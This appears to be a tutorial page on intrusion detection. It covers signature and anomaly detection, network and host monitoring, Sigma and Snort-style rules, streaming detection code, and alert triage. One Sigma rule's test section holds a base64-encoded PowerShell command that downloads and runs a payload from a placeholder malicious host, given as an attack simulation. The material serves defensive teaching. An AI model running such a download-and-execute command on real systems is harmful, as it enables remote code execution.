Loading content...
Security logging gives you visibility; intrusion detection turns that visibility into action. While logs passively record what happens, intrusion detection actively analyzes events to identify attacks in progress—the difference between having security cameras and having guards watching those cameras.
Intrusion detection operates on a fundamental premise: attackers leave traces. Whether they're scanning for vulnerabilities, exploiting weaknesses, moving laterally through networks, or exfiltrating data, their activities generate patterns that differ from normal operations. The challenge is finding those patterns in the vast ocean of legitimate activity.
Modern intrusion detection has evolved far beyond simple pattern matching. Today's systems combine signature-based detection (matching known attack patterns), behavioral analysis (identifying deviations from baselines), machine learning (discovering novel threats), and threat intelligence (leveraging global knowledge). Understanding these techniques—and when to apply each—is essential for building detection capabilities that find real attackers while minimizing false positives.
By the end of this page, you will understand the fundamentals of intrusion detection, the differences between signature-based and behavior-based detection, how to architect detection systems at scale, and strategies for balancing detection sensitivity with operational noise. You'll learn to design detection capabilities that catch attackers without drowning security teams in false alarms.
An Intrusion Detection System (IDS) is a security technology that monitors systems or networks for malicious activity or policy violations. When suspicious activity is detected, an IDS generates alerts for security teams to investigate.
The Core Problem
Intrusion detection addresses a fundamental security challenge: how do you know when someone is attacking your systems? By the time damage is visible (data breach disclosed, ransomware deployed, systems offline), the attacker has often been present for weeks or months. The average dwell time—how long attackers remain undetected—is approximately 200 days in many industries.
IDS aims to dramatically reduce dwell time by identifying attack indicators early in the kill chain, ideally during reconnaissance or initial access rather than after objectives are achieved.
| Kill Chain Phase | Attacker Activity | Detection Opportunity |
|---|---|---|
| Reconnaissance | Port scanning, service enumeration, OSINT gathering | Network scan detection, unusual DNS queries, honeypot triggers |
| Initial Access | Phishing, vulnerability exploitation, credential stuffing | Failed auth spikes, exploit signatures, suspicious email patterns |
| Execution | Malware deployment, script execution, payload decoding | Process anomalies, script behavior, known malware signatures |
| Persistence | Backdoor installation, scheduled tasks, credential storage | Startup modifications, unexpected services, registry changes |
| Privilege Escalation | Exploiting local vulnerabilities, credential theft | Privilege changes, unusual sudo/admin access, LSASS access |
| Lateral Movement | Pass-the-hash, RDP, SMB exploitation | Unusual authentication patterns, network traffic anomalies |
| Exfiltration | Data collection, compression, external transfer | Large data transfers, unusual destinations, timing anomalies |
IDS vs. IPS: Detection vs. Prevention
It's important to distinguish between related but distinct concepts:
IDS (Intrusion Detection System): Monitors and alerts on suspicious activity. It's a passive observer that doesn't block traffic or modify behavior—it tells you something is happening.
IPS (Intrusion Prevention System): Actively blocks detected threats. It can drop packets, terminate connections, or quarantine systems. This adds protection but also risk—false positives can block legitimate activity.
The choice between IDS and IPS depends on confidence levels:
| Confidence | Action | Example |
|---|---|---|
| Very High | Block (IPS) | Known malware signature, banned IP |
| High | Alert (IDS) + Manual Response | Behavioral anomaly, possible attack |
| Medium | Alert (IDS) | Unusual but not clearly malicious |
| Low | Log for Analysis | Baseline deviation, requires context |
Many organizations use both: IPS for high-confidence threats (known ransomware signatures) and IDS for lower-confidence detections that require human judgment.
Every IDS faces a fundamental tradeoff. Increase sensitivity to catch more attacks, and you generate more false positives (alert fatigue). Decrease sensitivity to reduce noise, and you miss real attacks. The goal isn't zero false positives—it's an acceptable ratio that security teams can operationally handle while maintaining detection coverage.
There are fundamentally two approaches to intrusion detection, each with distinct strengths and limitations. Effective detection strategies combine both.
Signature-Based Detection
Signature-based detection (also called misuse detection) works by matching observed activity against a database of known attack patterns—signatures. When activity matches a signature, an alert is generated.
How it works:
Signature examples:
# Detect SQL injection attempt
alert tcp any any -> any 80
(content:"' OR '1'='1"; msg:"SQL Injection Attempt";)
# Detect Nmap SYN scan
alert tcp any any -> any any
(flags:S; detection_filter:track by_src, count 20, seconds 5;
msg:"Possible Nmap SYN Scan";)
# Detect known malware C2 domain
alert dns any any -> any any
(dns.query; content:"evil-c2-domain.com";
msg:"Known Malware C2 Communication";)
Behavior-Based Detection (Anomaly Detection)
Behavior-based detection takes a fundamentally different approach. Rather than matching known attack patterns, it establishes baselines of normal behavior and alerts when activity deviates significantly from those baselines.
How it works:
Behavioral baselines might track:
The most effective detection strategies layer both approaches. Use signature-based detection to catch known attacks with high confidence, and behavior-based detection to find novel threats. Correlate alerts from both to increase confidence: an anomaly that also matches a known pattern is more likely to be a real attack.
Intrusion detection systems are deployed at two primary vantage points: the network and the host. Each offers unique visibility into different aspects of potential attacks.
Network-Based IDS (NIDS)
NIDS monitors network traffic flowing across network segments, typically deployed at network choke points (egress, between zones) or using traffic mirroring.
What NIDS sees:
NIDS Deployment Patterns:
Perimeter NIDS: Monitors ingress/egress traffic at network boundary. Catches external attacks, C2 communications, exfiltration.
Internal NIDS: Monitors east-west traffic between network zones. Critical for detecting lateral movement after initial compromise.
Cloud NIDS: Traffic mirroring in VPCs, monitoring flow logs. AWS VPC Traffic Mirroring, GCP Packet Mirroring.
NIDS Challenges in Modern Environments:
Encryption: TLS encrypts payload content, limiting deep packet inspection. Solutions include TLS termination at inspection points or relying on metadata analysis.
Volume: High-bandwidth networks can overwhelm NIDS. Solutions include sampling, specialized hardware (FPGA-based inspection), or cloud-native network analysis.
Ephemeral workloads: Containers and serverless create short-lived network endpoints. Solutions include service mesh integration and workload-aware monitoring.
Host-Based IDS (HIDS)
HIDS runs on individual hosts (servers, workstations) and monitors activity at the system level—everything the network can't see.
What HIDS sees:
| Aspect | Network-Based (NIDS) | Host-Based (HIDS) |
|---|---|---|
| Deployment | Network infrastructure (TAPs, mirrors) | Agent on each host |
| Visibility | All network traffic on monitored segment | All activity on monitored host |
| Encryption impact | Limited view into encrypted payloads | Sees decrypted data on host |
| Coverage | All hosts on network segment | Only hosts with agents installed |
| Maintenance | Centralized, few devices | Distributed across all hosts |
| Performance impact | None on endpoints | Some CPU/memory on each host |
| Evasion | Encrypted channels, protocol abuse | Disabling agent, kernel rootkits |
| Best for | Network attacks, lateral movement, exfiltration | Malware, privilege escalation, insider threats |
Popular HIDS/EDR Solutions:
Endpoint Detection and Response (EDR) extends HIDS with:
NIDS and HIDS aren't alternatives—they're complementary. NIDS catches attackers crossing network boundaries; HIDS catches what they do once inside a host. An attacker using encrypted C2 evades NIDS but is visible to HIDS when they execute commands. An attacker moving laterally via legitimate protocols (RDP, SMB) may evade HIDS detection rules but creates network patterns visible to NIDS.
Detection engineering is the discipline of systematically creating, testing, and maintaining detection rules. It treats detection as a software engineering problem—with version control, testing, deployment pipelines, and metrics.
The Detection Development Lifecycle:
MITRE ATT&CK as Detection Framework
The MITRE ATT&CK framework catalogs known adversary tactics and techniques. It provides:
Coverage mapping: Map your detections to ATT&CK techniques to identify gaps:
Tactic: Persistence
├── T1053: Scheduled Task/Job
│ ├── Detection: Windows Task Scheduler events (4698, 4699)
│ ├── Coverage: HIGH
│ └── Last validated: 2024-01-15
├── T1547: Boot/Logon Autostart Execution
│ ├── Detection: Registry key monitoring
│ ├── Coverage: MEDIUM (some keys missed)
│ └── Last validated: 2023-11-20
└── T1053: Cron Jobs
├── Detection: Not implemented
├── Coverage: NONE
└── Priority: Add to backlog
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960
# Sigma Rule Format - Platform-agnostic detection ruletitle: Suspicious PowerShell Encoded Commandid: d8c0b5e1-2d3f-4a5c-9b8e-1234567890abstatus: productiondescription: | Detects PowerShell execution with base64-encoded commands, commonly used by malware to obfuscate malicious scripts.references: - https://attack.mitre.org/techniques/T1059/001/ - https://attack.mitre.org/techniques/T1027/author: Security Teamdate: 2024/01/15modified: 2024/01/20 tags: - attack.execution - attack.t1059.001 - attack.defense_evasion - attack.t1027 logsource: category: process_creation product: windows detection: selection: Image|endswith: - '\powershell.exe' - '\pwsh.exe' CommandLine|contains: - '-encodedcommand' - '-enc ' - '-en ' - '-ec ' filter_legitimate: # Known legitimate uses of encoded commands ParentImage|endswith: - '\System32\svchost.exe' # Windows Update - '\Microsoft\ConfigMgr\AdminConsole\bin\Microsoft.ConfigurationManagement.exe' User|contains: 'SYSTEM' condition: selection and not filter_legitimate falsepositives: - SCCM/MECM deployment scripts - Some legitimate admin tools - Automated system management level: high # Testing metadatatesting: attack_simulation: command: "powershell.exe -encodedcommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AbQBhAGwAaQBjAGkAbwB1AHMALgBjAG8AbQAvAHAAYQB5AGwAbwBhAGQAJwApAA==" expected: alert benign_simulation: command: "powershell.exe -encodedcommand VwByAGkAdABlAC0ASABvAHMAdAAgACcASABlAGwAbABvACcA" expected: alert # Still triggers, shows false positive rate last_validated: 2024-01-18 true_positive_rate: 0.92 false_positive_rate: 0.15Detection Rule Testing
Detection rules must be tested before deployment—just like application code. Testing approaches:
Red Team Simulations: Execute actual attacks in controlled environments to validate detection
Atomic Red Team: Open-source library of attack simulations mapped to ATT&CK
# Run specific technique simulation
Invoke-AtomicTest T1059.001 -TestNumbers 1
MITRE Caldera: Automated adversary emulation platform
Historical Replay: Replay known-malicious traffic/logs through detection rules
Production Shadowing: Run new rules in shadow mode (log matches but don't alert) to measure false positive rates before activation
Like technical debt, detection debt accumulates when rules aren't maintained. Stale rules that no longer match modern attack variants, rules with excessive false positives that get ignored, and gaps in coverage for new techniques all represent detection debt. Regular review cycles (quarterly at minimum) should validate, tune, and retire detection rules.
Large-scale detection presents unique challenges. When you're processing billions of events daily across thousands of hosts and network segments, naive approaches that work in small environments fail spectacularly.
Scale Challenges:
Volume: A medium enterprise generates 10-100 billion events/day. Running complex detection rules against every event is computationally prohibitive.
Velocity: Events must be processed in near real-time for detections to be actionable. Detecting an attack 4 hours later isn't useful.
Variety: Events come in hundreds of formats from diverse sources. Normalizing everything for consistent analysis is challenging.
Alert Volume: Even a 0.01% false positive rate on 10 billion events is 1 million false alerts/day—completely unmanageable.
Tiered Detection Architecture
Effective scaled detection uses a tiered approach, with different detection layers for different event volumes and detection complexities:
Tier 1: Stream Processing (Real-time)
Tier 2: Micro-Batch Processing (Near Real-time)
Tier 3: Batch Processing (Periodic)
Tier 4: Threat Hunting (Manual)
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667
from pyspark.sql import SparkSessionfrom pyspark.sql.functions import *from pyspark.sql.window import Window # Real-time detection using Spark Structured Streamingspark = SparkSession.builder.appName("SecurityDetection").getOrCreate() # Read from Kafka streamevents = (spark.readStream .format("kafka") .option("kafka.bootstrap.servers", "kafka:9092") .option("subscribe", "security-events") .load() .select(from_json(col("value").cast("string"), event_schema).alias("event")) .select("event.*")) # Detection: Brute Force Login Attempts# Alert when >10 failed logins from same IP in 5 minuteslogin_failures = events.filter( (col("event.category") == "authentication") & (col("event.outcome") == "failure")) brute_force = (login_failures .withWatermark("@timestamp", "10 minutes") .groupBy( window(col("@timestamp"), "5 minutes"), col("source.ip") ) .agg( count("*").alias("failure_count"), collect_set("user.name").alias("targeted_users") ) .filter(col("failure_count") > 10)) # Detection: Impossible Travel# Alert when same user authenticates from geographically distant # locations in short time periodauth_success = events.filter( (col("event.category") == "authentication") & (col("event.outcome") == "success")) user_window = Window.partitionBy("user.id").orderBy("@timestamp") impossible_travel = (auth_success .withColumn("prev_location", lag("source.geo").over(user_window)) .withColumn("prev_time", lag("@timestamp").over(user_window)) .withColumn("distance_km", calculate_distance( col("source.geo"), col("prev_location"))) .withColumn("time_diff_hours", (col("@timestamp").cast("long") - col("prev_time").cast("long")) / 3600) .withColumn("required_speed_kmh", col("distance_km") / col("time_diff_hours")) # Alert if required travel speed > 1000 km/h (impossible without flight) .filter(col("required_speed_kmh") > 1000)) # Write alerts to Kafka topic(brute_force.union(impossible_travel) .selectExpr("to_json(struct(*)) as value") .writeStream .format("kafka") .option("kafka.bootstrap.servers", "kafka:9092") .option("topic", "security-alerts") .option("checkpointLocation", "/checkpoints/detection") .outputMode("update") .start())Pre-filtering Strategies
Not every event needs full detection analysis. Implement pre-filtering to reduce load on detection engines:
Known-Good Filtering: Events from verified internal monitoring systems, health checks, expected automated processes can be filtered early (but still logged).
Severity-Based Routing: Route only high-severity source events through expensive detection rules.
Sampling for Baselines: For behavioral models, statistical sampling can establish baselines without processing every event.
Event Deduplication: Repeated identical events (from chatty systems) can be deduplicated with count aggregation.
Raw Events: 10 billion/day
↓ Known-good filter (remove monitoring, health checks)
Filtered: 4 billion/day
↓ Deduplication (collapse repeated events)
Deduplicated: 1 billion/day
↓ Severity routing (only high-severity for complex rules)
Complex Detection: 100 million/day
Detection is only valuable if alerts lead to action. Alert management transforms raw detections into investigations and responses.
The Alert Fatigue Crisis
Alert fatigue is the biggest operational challenge in security monitoring. Studies show:
The consequence: real attacks are missed because they're lost in the noise of false positives and low-priority alerts.
Alert Quality Metrics
Measure and optimize these metrics:
True Positive Rate (TPR): Of all actual attacks, what percentage did we detect?
TPR = True Positives / (True Positives + False Negatives)
Precision (Positive Predictive Value): Of all alerts, what percentage were real attacks?
Precision = True Positives / (True Positives + False Positives)
Mean Time to Detect (MTTD): How long between attack start and alert generation?
Mean Time to Investigate (MTTI): How long between alert and analyst beginning investigation?
Optimize for precision without sacrificing critical recall. Most organizations run 20-30% precision (70-80% false positive rate). World-class detection achieves 70%+ precision.
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108
interface SecurityAlert { id: string; timestamp: string; rule_name: string; severity: 'low' | 'medium' | 'high' | 'critical'; source_ip?: string; user_id?: string; asset_id?: string; raw_event: Record<string, unknown>;} interface EnrichedAlert extends SecurityAlert { enrichment: { asset?: { name: string; criticality: 'low' | 'medium' | 'high' | 'critical'; owner: string; network_zone: string; }; user?: { name: string; department: string; risk_score: number; recent_activity_anomalies: number; }; threat_intel?: { ip_reputation: 'clean' | 'suspicious' | 'malicious'; known_iocs: string[]; threat_actor?: string; }; historical?: { similar_alerts_30d: number; false_positive_rate: number; avg_investigation_time_min: number; }; }; risk_score: number; auto_triage_recommendation: 'investigate' | 'likely_fp' | 'auto_close';} async function enrichAlert(alert: SecurityAlert): Promise<EnrichedAlert> { // Parallel enrichment from multiple sources const [asset, user, threatIntel, historical] = await Promise.all([ alert.asset_id ? assetDatabase.lookup(alert.asset_id) : null, alert.user_id ? identityService.lookup(alert.user_id) : null, alert.source_ip ? threatIntelligence.checkIP(alert.source_ip) : null, alertHistoryService.getSimilarAlerts(alert.rule_name, 30), ]); // Calculate composite risk score const riskScore = calculateRiskScore({ alertSeverity: alert.severity, assetCriticality: asset?.criticality, userRiskScore: user?.risk_score, threatIntelMatch: threatIntel?.ip_reputation === 'malicious', historicalFPRate: historical?.false_positive_rate, }); // Auto-triage recommendation const recommendation = determineTriageAction({ riskScore, fpRate: historical?.false_positive_rate || 0, threatIntel, userAnomalies: user?.recent_activity_anomalies || 0, }); return { ...alert, enrichment: { asset, user, threat_intel: threatIntel, historical }, risk_score: riskScore, auto_triage_recommendation: recommendation, };} function calculateRiskScore(factors: { alertSeverity: string; assetCriticality?: string; userRiskScore?: number; threatIntelMatch: boolean; historicalFPRate?: number;}): number { let score = 0; // Base score from alert severity const severityScores = { low: 10, medium: 30, high: 60, critical: 90 }; score += severityScores[factors.alertSeverity] || 20; // Asset criticality multiplier const criticalityMultipliers = { low: 0.5, medium: 1.0, high: 1.5, critical: 2.0 }; score *= criticalityMultipliers[factors.assetCriticality] || 1.0; // User risk score contribution if (factors.userRiskScore) { score += factors.userRiskScore * 0.3; } // Threat intel boost if (factors.threatIntelMatch) { score *= 1.5; } // Historical false positive penalty if (factors.historicalFPRate && factors.historicalFPRate > 0.7) { score *= 0.5; // Heavily penalize high-FP rules } return Math.min(100, Math.max(0, score));}Deploying intrusion detection in a real environment requires careful planning and incremental rollout. Here's a practical implementation approach:
| Phase | Duration | Activities | Success Criteria |
|---|---|---|---|
| Discovery | 2-4 weeks | Inventory assets, map data sources, identify critical systems, understand attack surface | Complete asset inventory, data source catalog |
| Foundation | 4-8 weeks | Deploy log collection, establish SIEM/detection platform, implement baseline detections | All critical logs collected, basic detections active |
| Coverage Expansion | 8-12 weeks | Add detection rules mapped to ATT&CK, integrate threat intel, tune false positives | 80%+ ATT&CK coverage for critical techniques |
| Optimization | Ongoing | Reduce false positives, automate response, improve MTTD, threat hunting | Precision >50%, MTTD <1 hour for critical |
Starting Detection Rules
When building initial detection capability, prioritize these high-value, low-noise detections:
Authentication-Based:
Administrative Actions:
Network-Based:
Resist the temptation to deploy complex ML-based detection immediately. Start with simple, high-confidence signature rules for known-bad activity. Get operational excellence (analyst workflow, alert handling, tuning process) working well before adding complexity. A small number of well-tuned detections outperforms hundreds of noisy rules.
Intrusion detection transforms security logging from passive recording into active threat identification. By systematically analyzing events for attack indicators, you can find adversaries before they achieve their objectives.
What's Next:
Intrusion detection identifies known attack patterns and significant anomalies. But sophisticated attackers operate in ways that blend with normal activity. The next page covers Anomaly Detection—using statistical methods and machine learning to identify subtle deviations that signature-based detection misses.
You now understand intrusion detection fundamentals, methodologies, and implementation. This knowledge enables you to design detection systems that find attackers in your environment while maintaining operational sanity through effective alert management.